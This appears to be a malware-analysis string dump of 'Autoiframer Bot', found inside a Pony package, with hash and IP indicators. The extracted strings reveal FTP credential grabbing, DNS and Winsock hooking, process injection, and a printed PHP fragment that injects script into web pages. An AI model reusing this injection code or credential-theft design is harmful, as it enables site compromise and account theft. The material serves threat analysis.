95.58.254.79(Pony hosted in Kazakhstan Almaty Jsc Kazakhtelecom)

Pony-legit-packed

s.exe inside pony package is Autoiframer Bot, Version 1.0

here some strings from the sample:

File: ZR1.exe
Size: 193552 Bytes
MD5: A889A2ADAFEFF5A16AFF93DD668B763C
Packer: File not found C:peid.exe

File Properties: CompanyName      
FileDescription  
FileVersion      
InternalName     
LegalCopyright   
OriginalFilename 
ProductName      
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 212Kb in 0,016 seconds
Urls
--------------------------------------------------
MiscHTTP.cpp:HTTP::DownloadString->
http://ftp://
sftp://

RegKeys
--------------------------------------------------
SOFTWAREZR1
>SOFTWAREZR1

ExeRefs
--------------------------------------------------
File: ZR1_dmp.exe_
dwm.exe
conhost.exe
dbgview.exe
taskhost.exe
csrss.exe
lsass.exe
winlogon.exe
smss.exe
svchost.exe
services.exe
ZR1.exe
marrageZR1.exe

Raw Strings:
--------------------------------------------------
File: ZR1_dmp.exe_
MD5:  a23c21b459298e70ba939155b8c194f1
Size: 217090

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.rsrc
@.reloc
SVW3
Ph(|A
hH|A
h(|A
u0h|A
h(|A
WWWh
D$8$}A
D$<@}A
D$@T}A
D$Dh}A
;D$(
D$ P
D$XPh
D$ P
D$XPj:
T$,#
hEIo
t&9N
t!9N
9N(t
QQQQh(~A
5lPA
h@~A
hP~A
hX~A
hx~A
PhX~A
YYPh
|tOh
=tPA
5<QA
D$ SP
u:hT
S<Uu
G<Iu
;<Cu
D$ h
YYSW
D$ h
j@X;
GBSP
<3@u
j@X;
j@X;
G@_^[]
=tPA
HPQj
SVWjL
9|t.h
j@X;
=tPA
5<QA
HC;]
PWWWWWWW
YY_^[
t[Wh
QSWj
N WQ
(VWj
hj-@
u<hL
YY_^
u,WV
U Ph
t8ht
E(_^[
h37@
YYhH
YYhl
hB6@
YYh|
h^3@
YY_^[
QQj@Rj
Af;M
Af;H
tKPPj@Sj
Bf;P
VWj@h
F 9^$t
9^(t
uDh
z;h[
@P+E
tS9M
tSSW
hKK@
hbK@
=tPA
YYj@3
t?VWS
WWW3
CSh@
Vj$j
G@PW
H@WQP
SVWh
G,Ph
YY9E
=tPA
H@VQP
YYu=hx
=tPA
=hPA
YY_^[
PSSj
PSSj
jD^V
PSSSSSSS
X_^[
PVWS
1RZtAhp
xSVW
[^;E
QSVW3
=lPA
SVW3
<1=uq
5lPA
D$*P
5lPA
D$$h
DD,P
D$0Ph
D$2P
D$$h
DD,P
D$0Ph
C;$
SVWw
wqtc=
t==%
t*=&
wmtb
VVVVh
VVjPh
VVhH
@_^[
=lPA
@[_^
AG;}
5hPA
YY_[
QVWj
SVWh
YYt4h
YYSV
%33331
33331
][_^
][_^
33331
33331
_^][
33331
33331
_^][
USVW
WVWV
L$8Q
D$4PS
_^[]
USVW
WVWV
D$8P
D$8P
D$8PS
_^[]
^[_3
woVW
tR:Q
t<:Q
t&:Q
@FA;
 SW3
=L1B
=L1B
^_[3
=L1B
95 JB
YQPVh
u+9u
hPA
h@A
h8RA
h RA
uTVWh
5LQA
h$fA
PPPPP
<v*V
^SSSSS
@u^V
t%HHt
HHtXHHt
HHty+
5LQA
RPSW
90tW
?If90t
PPPPP
95 1B
E$1B
_^[]
to=8
Y_^[]
Fpt"
5@1B
5H1B
FpkA
5D1B
F=pkA
hXjA
hLjA
h@jA
h8jA
=<1B
5$QA
=@1B
=D1B
5D1B
5@1B
5<1B
5PQA
5@1B
5D1B
5H1B
=LQA
5<1B
5D1B
9]$u
9](SS
5`PA
t"SS9] u
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
X^_]
FGIu
t&:a
5LQA
=PQA
9M$u
<+t"<-t
+t HHt
Y__^[
9csm
t h,
URPQQh@
L$,3
UVWS
[_^]
SVWj
_^[]
j@j ^V
SWf9M
j@j 
8csm
tAVWP
Y[_^
PPPPP
8"u8
jYf
t$9U
QQSVWh
N+D$
j h@
t!Ht
_^[]
Y_^[
Y_^[
u}hxlA
hllA
5PQA
hlA
hHlA
h,lA
5LQA
_^[]
t'Ou
VVhU
u,9E
QSWVj
9] SS
v4;5l
vL;5
PPPPPPPP
PPPPPPPP
~%9M
r 8^
r"9U
r"9U
80t/
PPPPP
SQRP
jdRP
@PVS
@PVS
Wj0S
|-;E
VVVVV
5@6B
=<6B
%06B
-,6B
~,WPV
98t^
tVPV
t/9U
SVWUj
hx+A
]_^[
;t$,v-
UQPXY]Y[
_^[]
u'9E
SSSSW
SSSSW
@PWV
_^[]
PPPPP
WVU3
N+D$
PPPPP
u"9U
0K;]
@tH9
%LPA
9csm
  ##%%&&))**,,//1122447788;;==>>@@CCEEFFIIJJLLOOQQRRTTWWXX[[]]^^aabbddgghhkkmmnnppssuuvvyyzz||
CorExitProcess
(null)
( 8PX
700WP
`h````
xpxxxx
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~
('8PW
700PP
`h`hhh
xppwpp
UTF-8
UTF-16LE
UNICODE
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
 new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
e+000
1#QNAN
1#INF
1#IND
1#SNAN
%s%ls
Autoiframer Bot.cpp:wWinMain->
<Main>
SOFTWAREZR1
Autoiframer Bot.cpp:InfectAllProcesses->
Communication.cpp:DoRequest->
Communication.cpp:ProcessIframeCommand->
%s%s
next credential
Communication.cpp:CommandHandler->
ftp://
sftp://
Communication.cpp:DecodeFile->
Communication.cpp:ProcessUploadCommand->
Communication.cpp:SendPassword->
Communication.cpp:ProcessDownloadCommand->
Communication.cpp:ProcessCheckCommand->
CreateProcessW
GrabberCreateProcess Hook.cpp:Hook_CreateProcess->
GrabberCreateProce
ss Hook.cpp:DisplayInfo->
GrabberCreateProcess Hook.cpp:Hooked_CreateProcessW->
GrabberDNS.cpp:Hook_DNS->
DnsQuery_W
getaddrinfo
GetAddrInfoW
gethostbyname
GrabberDNS.cpp:Hooked_gethostbyname->
GrabberDNS.cpp:ParseADDRINFO->
%s exists
GrabberDNS.cpp:Hooked_GetAddrInfoW->
GrabberDNS.cpp:Hooked_getaddrinfo->
GrabberDNS.cpp:Hooked_DnsQuery_W->
GrabberDNS.cpp:GetDomainName->
%s not found
GrabberHook.cpp:DetourCreateInternal->
GrabberInject.cpp:Inject::CreateRemoteData->
GrabberInject.cpp:Inject::CreateThreadInRemoteProcess->
GrabberInject.cpp:Inject::Run->
GrabberInject.cpp:Inject::ProcessImport->
GrabberWinsock.cpp:HookWS2_32->
closesocket
connect
send
USER 
anonymous
PASS 
0.0.0.0
GrabberWinsock.cpp:Hooked_send->
GrabberWinsock.cpp:AddToSocketList->
&check[%i]=%i
<?php
function abc_ZR1($buffer)
$Script = <<<EOS
EOS;
// inline scripts
if(strpos($buffer, '<script') !== false)
// Find script
$Pos = strpos($buffer, '<script');
// Find start
while($buffer[$Pos] != '>') $Pos++;
$Pos += strlen('>');
// Replace
return substr($buffer, 0, $Pos) . (chr(13) . chr(10)) . $Script . substr($buffer, $Pos);
// Before </head>
if(strpos($buffer, '</head>') !== false)
$Pos = strpos($buffer, '</head>');
$Script = '<script>' . (chr(13) . chr(10)) . $Script . (chr(13) . chr(10)) . '</script>';
// Replace
return substr($buffer, 0, $Pos) . $Script . substr($buffer, $Pos);
// Lucky bastard! (Though you should think about your site layout. It's horrible. And users love scripts, really!)
return $buffer . '<!--I will be back-->';
ob_start("abc_ZR1");
u:projectszr1autoiframer botautoiframer botiframer & uploader..MiscWininetFTPWrapper.h:WininetFTPWrapper::Upload->
u:projectszr1autoiframer botautoiframer botiframer & uploader..MiscWininetFTPWrapper.h:WininetFTPWrapper::ExtendedError->
Iframer & UploaderIframer.cpp:IframeHost->
public_html
html
htdocs
forum
board
</head>
<script type="text/javascript">
</script>
%s%s
Iframer & UploaderIframer.cpp:InfectHTMLPage->
Iframer & UploaderIframer.cpp:IFramerCallback->
index.html
index.htm
index.php
default.aspx
index.cshtml
index.vbhtml
Site.master
<?php
&iframe[%s]=%i|%s/%s
&iframe[%s]=%i|%s%s%s
Iframer & UploaderUploader.cpp:UploadFileToFTP->
Iframer & UploaderUploader.cpp:UploaderCallback->
&upload[%i]=%i-%s/%s
&upload[%i]=%i-%s/%s/
Iframer & UploaderUploader.cpp:ManageUpload->
Install.cpp:UnInstall->
Install.cpp:Install->
Install.cpp:IsLegitimate->
T`00P
V++}
L&&jl66Z~??A
Oh44Q
sb11S*
RF##e
&N''i
X,,t4
v;;M
R)){
>^//q
,@  `
r99K
f33U
x<<D%
p88H
uB!!c 
z==G
D""fT**~;
;d22Vt::N
H$$l
Cn77Y
J%%o..r8
|>>Bq
j55_
P((x
Z--w
P`00
gg}V++
jL&&Zl66A~??
h44
Sb11?*
eF##^
iN''
tX,,.4
RRMv;;a
{R))>
q^//
`@  
Kr99
MMUf33
PPDx<<
Hp88
cB!!0 
DD9.
~~Gz==
]]+2
fD""~T**
Vd22Nt::
lH$$
Yn77
xxoJ%%r..$8
tt!>
ppB|>>
aa_j55
UUxP((z
wZ--
0P`0
g+}V+
&jL&6Zl6?A~?
4h4
1Sb1
#eF#
'iN'
,tX,
R;Mv;
){R)
/q^/
 `@ 
9Kr9J
M3Uf3
P<Dx<
8Hp8
!cB!
~=Gz=d
"fD"*~T*
2Vd2:Nt:
$lH$
7Yn7m
x%oJ%.r.
p>B|>
a5_j5W
U(xP(
-wZ-
00P`
++}V
=&&jL66Zl??A~
44h
11Sb
##eF
''iN
,,tX
-6nn
;;Mv
})){R
//q^
  `@
g99KrJJ
33Uf
<<Dx
!88Hp
!!cB
==Gzdd
+2ss
""fD**~T
22Vd::Nt
$$lH
77Ynmm
%%oJ..r
!>KK
>>B|
55_jWW
3"ii
((xP
)--wZ
P~AeS
-Xt!
X>k'
Q3`bS
pHhX
lZrN
6-9'
$6.:
ZwKi
T~Fb
*?#1
>8$4,
pHlt
WBPQ
S~Ae
Xt!)I
Q3EbS
+XpHh
@Cwg
pNlZr
'6-9d
[T:$6.
 iZwK
*C<"
Df;4[
bT~F
1*?#0
f7tN
,8$4_
(<IA
tHlB
eS~A
U 0m
Xti)I
EbSw
hXpH
*fU(
H2+p
rNlZ
9'6-
!hT
[.:$6g
KiZw
Df~4[
Bc"@
j_FbT~
#1*?
h4,8$@_
2tHlWB
PQAeS~
U vm
Ebdw
HhXpE
ZrNl
=-9'6
!h[T
6.:$
awKiZ
~4[C)v
j~FbT
1?#1*
[_=o
$4,8
ltH
8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS
EHltFeQ
T~FbZwKi
,8$4'6-9:$6.1*?#XpHhS~AeNlZrEbS
tHl
FeQbT~FiZwK
*<zG
V},z7
4,8$9'6-.:$6#1*?hXpHeS~ArNlZ
EbStHlQ
FeFbT~KiZw
$4,8-9'66.:$?#1*HhXpAeS~ZrNlS
EbltHeQ
F~FbTwKiZ
%02X 
====
%i.%i.%i %i:%i:%i:%i
MiscDebug.cpp:DebugOutput->
MiscDebug.cpp:LogInstructions->
%08X
Err: %-2X
*** Recursive Stack Dump skipped
*** CallStack:
Fault @
 + 0x%X
 (%08LX)
Fault Occured:
*** %2d 
 + 0x%X
(%08X)
&dbg=
ACCESS VIOLATION
DATATYPE MISALIGNMENT
BREAKPOINT
SINGLE STEP
ARRAY BOUNDS EXCEEDED
FLT DENORMAL OPERAND
FLT DIVIDE BY ZERO
FLT INEXACT RESULT
FLT INVALID OPERATION
FLT OVERFLOW
FLT STACK CHECK
FLT UNDERFLOW
INT DIVIDE BY ZERO
INT OVERFLOW
PRIV INSTRUCTION
IN PAGE ERROR
ILLEGAL INSTRUCTION
NONCONTINUABLE EXCEPTION
STACK OVERFLOW
INVALID DISPOSITIO
GUARD PAGE
(unknown)
Error code %08X: %s
Time: %i.%i.%i %i:%i:%i:%i
File: %s
Bot base: %08X
Last Error: %i
Address: 
 + 0x%X
Flags: %08X
write to
exec
read from
Attempted to %s address %X
(%i)
EAX: %X
ECX: %X
EDX: %X
EBX: %X
EDI: %X
ESI: %X
EBP: %X
ESP: %X
MiscDebug.cpp:MyUnhandledExceptionFilter->
ZR1 - DEbug
MiscHTTP.cpp:HTTP::DownloadString->
MiscLinkedList.cpp:New->
MiscProcess.cpp:Is64Bit->
MiscRegistry.cpp:getValueAsDword->
Error when TiXmlDocument added to document, because TiXmlDocument can only be at the root.
Error parsing CDATA.
Error null (0) or unexpected EOF found in input stream.
Error document empty.
Error parsing Declaration.
Error parsing Comment.
Error parsing Unknown.
Error reading end tag.
Error: empty tag.
Error reading Attributes.
Error reading Element value.
Failed to read Element name
Error parsing Element.
Failed to open file
Error
No error
&apos;
&quot;
&gt;
&lt;
&amp;
8.8.8.8
Remote.cpp:InitalizeInRemoteProcess->
Remote.cpp:Hooked_TypeLoadLibrary->
LoadLibraryW
RSDSS
U:projectsZR1Autoiframer BotAutoiframer Bot.pdb
URLDownloadToFileA
urlmon.dll
DnsQuery_A
DnsFree
DNSAPI.dll
InternetCloseHandle
InternetOpenA
InternetConnectA
FtpFindFirstFileA
InternetFindNextFileA
FtpGetCurrentDirectoryA
FtpSetCurrentDirectoryA
FtpOpenFileA
InternetWriteFile
FtpGetFileSize
InternetReadFile
InternetGetLastResponseInfoW
FtpCreateDirectoryA
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
WININET.dll
PathStripPathA
PathRemoveExtensionA
PathAppendA
PathAppendW
StrStrIW
SHLWAPI.dll
WSAAddressToStringA
WS2_32.dll
GetLastError
lstrlenW
HeapAlloc
GetProcessHeap
SetUnhandledExceptionFilter
GetModuleFileNameW
GetModuleHandleW
CreateThread
Sleep
GetCurrentProcessId
CreateToolhelp32Snapshot
Process32FirstW
CloseHandle
lstrcmpW
WaitForSingleObject
Process32NextW
LoadLibraryW
HeapFree
VirtualFree
HeapReAlloc
GetModuleFileNameA
GetTempPathA
GetTickCount
CreateProcessA
ResumeThread
WideCharToMultiByte
GetProcAddress
VirtualAlloc
VirtualProtect
DeleteFileW
CreateFileW
GetFileSize
ReadFile
WriteFile
lstrcpyW
CreateProcessW
OutputDebugStringA
GetTempPathW
lstrcatW
OutputDebugStringW
SetFilePointer
GetSystemTime
VirtualQuery
LocalAlloc
MultiByteToWideChar
KERNEL32.dll
wsprintfW
wsprintfA
USER32.dll
RegDeleteKeyW
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
RegCreateKeyExW
RegSetValueExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
DecodePointer
EncodePointer
GetCommandLineW
HeapSetInformation
GetStartupInfoW
ExitProcess
GetStdHandle
HeapCreate
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
LCMapStringW
IsProcessorFeaturePresent
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
RtlUnwind
SetHandleCount
GetFileType
DeleteCriticalSection
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
GetStringTypeW
HeapSize
SetStdHandle
WriteConsoleW
FlushFileBuffers
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
                        
        
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
Content-Type: application/x-www-form-urlencoded
Y:*@R:*R
wwwwwwwwwwwwwwwpx
pxwwwwwwwwwwwwwxpx
pxDDDDDDDDD@
pxDDDDDDDDDH
pxDDDDDDDDDH
pxDDDDDDDDDDDDDDpx
pwwwwwwwwwwwwwwwp
wwwwwwwpx
pxwwwwwwpxDDD
pxDDDDDDpx
pwwwwwwww
63[4]5mm]5]m]mm5mm555555555m555ed:
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
WkV21TSav^8{
}>qooggggggg1`_fhsnHK
{JLp
Nw~ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt
I3')+*+)))*))()*+++,6J!54 CBA
jYPQTVTSkllZTTXRTUiHceWda/
_<bm
}zy|yx~
{|yvrrwsqpon
PPPPPPPPPPPPPPPPPKMNNNNNNNNNNOLO
JHHGGGGGGGGHI
JEEEEEEEEEEFC
JEEEEEEEEEEFC
JEEEEEEEEEEFD
JEFEEEEEEEEEB
O%JEEEEEEEEEFFB
JJIIIIJIIIIJJ
O(@>=77A779?<8;$O' 
)O6530./21+*-,4#4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
wwwwwwwwwwwwwwwpx
pxwwwwwwwwwwwwwxpx
pxDDDDDDDDD@
pxDDDDDDDDDH
pxDDDDDDDDDH
pxDDDDDDDDDDDDDDpx
pwwwwwwwwwwwwwwwp
wwwwwwwpx
pxwwwwwwpxDDD
pxDDDDDDpx
pwwwwwwww
63[4]5mm]5]m]mm5mm555555555m555ed:
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
WkV21TSav^8{
}>qooggggggg1`_fhsnHK
{JLp
Nw~ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt
I3')+*+)))*))()*+++,6J!54 CBA
jYPQTVTSkllZTTXRTUiHceWda/
_<bm
}zy|yx~
{|yvrrwsqpon
PPPPPPPPPPPPPPPPPKMNNNNNNNNNNOLO
JHHGGGGGGGGHI
JEEEEEEEEEEFC
JEEEEEEEEEEFC
JEEEEEEEEEEFD
JEFEEEEEEEEEB
O%JEEEEEEEEEFFB
JJIIIIJIIIIJJ
O(@>=77A779?<8;$O' 
)O6530./21+*-,4#4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
PA<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
020q0v0
0:1?1q1x1}1
2:2@2E2S2a2n2
3B4P4_4j4
5$585J5R5
7"7*7/7F7[7`7k7
82898R8
999f9l9q9~9
9%:@:G:t:z:
;!;4;
<G<~<
=!=f=
>I>o>
0+090E0P0W0
0 1>1C1R1
1&2-2D2
3 434P4
4Q5V5]5k5
8A8G8V8
829D9P9
:6:B:
:];{;
="=+=0=;=
>+?6?;?B?P??
00050o0
01161<1H1S1b1o1v1}1
2 2+2:2G2M2S2_2j2y2
3%3q3v3}3
4R4l4
5L5S5
5,696L6Q66c6
7S77a7i7
8R8Y8s8
<d=j=o=
>)>5>@>G>
0%03090E0J0
1=2B2I2W2c2'3-323?3M3Y3
4,4:4F4
5<5u5z5
6q6v6
7[7a7f7s7
7$8)848;8
:$:*:8:C:J:V:c:i:z:
;9;B;^;};
<;<D<L<j<o<z<
=!>F>T>
>#?,?J?U?|?
0K0Q0V0c0q0}0
1:1F1Q1X1
2"2Q2_2v2
3+32393@3G3N3
5C5J5z5
7!7(7N7Y7
8)8.898h8m8{8
8%9A9l9~9
:w:}:
;";1;9;@;p;|;!<-<
<(=/=6=
=9>j>p>u>
?*?5?<?z?
0@0E0d0o0v0
1W1s1x1
3 393V3
4"4-444a4k4r4
5Q5^5
5e6j6u6|6
7#7K7
9Q:n:
; ;A;Z;u;
<;<A<F<S<a<m<x<
=.=3=<=I=S=_=
=D>o>
?.?E?W?
80W0o0
0-171
2$2B2I2R2[2d2m2v2
3,3H3T3q3
464N4s4
6"686U6^6y6}6
677<7U7`7
9$9=9H9
9T:[:
:O;V;
<X<o<
=V=`=q=z=
> >Q>
> ?(?2?<?C?O?Z?a?
5)5O5m5t5x5|5
5R6]6x6
7 7$7(7,7v7|7
7)858::f:
:9;>;H;
;i>p>
>4?<?O?Z?_?q?{?
0T0^0
2"2*202>2r2
2.33
3,494?4^5e5q6
7'7M7
3#3a3h3u3{3
4J4a4
6)636A6J6T6
6.7c7v7
8O9[9n9
:#:J:s:
:3;{;
<8=R=c=
>!>)>/>;>A>N>X>^>h>
?5?;?A?W?o?
020<0t0|0
1"1*131?1D1I1O1S1Y1^1d1i1x1
2#2e2
6u8|8
94999>9U9
: :6:
1*191F1R1b1i1x1
2M22e2
4,4G4
676=6g6
7D77z7
81878
=2=n=
>&>2>[>c>L?S?]?o?
070w0
0,12171E1J1O1T1d1
1'2,23282?2D2R2
2J3X3^3d3
4/4M4a4g4
5/575=5G5M5W5]5g5p5{5
20292E2|2
:':9:K:]:o:
< <I<o<
=r=}=
=)>0>4>8><>@>D>H>L>
>g?m?
0/1#2+2
3U4[4
6t7|7-8
9M:S:a:
4F6L6R6X6^6d6k6r6y6
737:7'9H9Q9x9
;U<o<x<
<Q=y=
>A>O>]>j>
>T?Z?f?
8)9Q9
;D;T;q;
8.8^8
$2(2,20242@2D2
5$5,545<5D5L5T55d5l5t5|5
(:,:0:4:8:<:@:D:H:L:P:T:X::`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;l;p;t;x;|;
,2l2p2
3(3H3h3
44484X4t4x4
5 5@5`5
7 7$7(7,7074787<7@7D7H7L7P7T7X7h7l7p7t7x7|7
9 9(9
= =$=8=<=@=D=H=L=P=T=X==h=l=p=t=x=|=
2 2$2(2,2024282<2@2D2H2L2P2T2X22`2d2

Unicode Strings:
---------------------------------------------------------------------------
mscoree.dll
runtime error 
TLOSS error
SING error
DOMAIN error
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
R6032
- not enough space for locale information
R6031
- Attempt to initialize the CRT more t
han once.
This indicates a bug in your application.
R6030
- CRT not initialized
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
R6010
- abort() has been called
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point support not loaded
AMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program: 
(null)
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
nKERNEL32.DLL
WUSER32.DLL
         (((((                  H
         h((((                  H
                                 H
BCONOUT$
%s: x%x
%s: %i
Install
Installed
Die reverser die
Process32First
dwm.exe
conhost.exe
dbgview.exe
taskhost.exe
csrss.exe
lsass.exe
winlogon.exe
smss.exe
svchost.exe
services.exe
NT_ERROR(xNtOpenProcess(...))
wininet.dll
http://
%s%s%s
heapallc
|heapalloc 2
strstr()
------
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
credentials done
files done
NumberOfFTPAccounts
Port
Uninstall
CreateProcess
Yipiee kay yeah motherfuckr
kernel32.dll
No process hook for me
Create suspended
Own _gRemoteData
Own Base
success
Entered
Dnsapi
Dnsapi.dll
Original_DnsQuery_W
!Original_DnsQuery_W
Ws2_32
oWs2_32.dll
Original_getaddrinfo
!Original_getaddrinfo
Original_GetAddrInfoW
!Original_GetAddrInfoW
numberOfResults
>numberOfIPs
>curr
Trampoline
>xNtAllocateVirtualMemory
remoteStruct
Write path
Cannot write remotedata
? !currentPE
SizeOfImage
allocate temp space to reloc
copy bot to temp space
alloc in remote process
New Base
Rebase/Import
tempCopyPEHeader->OptionalHeader.SizeOfImage
dwWritten
Difference
VPEx
Nothing to start?
No Imports
I think I can steal from you and just walk away.
0YEEAAH
WHAAAT?
FtpOpenFile
Write failed
Couldn't connect or logn
upload
Is domain
@ASPX
HTML
Is file
backup dir
change to DirectoryFound
Couldn't create
Couldn't change to
Deleting Botfile
>SOFTWAREZR1
Deleting registry info
<MAIN>
No reg
ZR1.exe
CreateFile
Done
Wrong encryptionkey
Modified
Wron path
debug Dec 24 2012.txt
temp?
InstructionsToDissassemble
StartFaultAddress
ASLR is no problem in that case. Or is it?
gPOST
dwBytesAvailable
Download - HeapAlloc - BytesAvailable
Download - HeapAlloc - GetLastError()
dwBytesRead
alloc list elem
Fail
value
ws2_32.dll
C:Documents and SettingsxxxMenu D
marrerProgrammesD
marrageZR1.exe
&File
iE&xit
&Help
h&About ...
About Autoiframer Bot
MS Shell Dlg
Autoiframer Bot, Version 1.0
Copyright (C) 2012
Autoiframer Bot
AUTOIFRAMERBOT

The mesage for reversers:

Die reverser die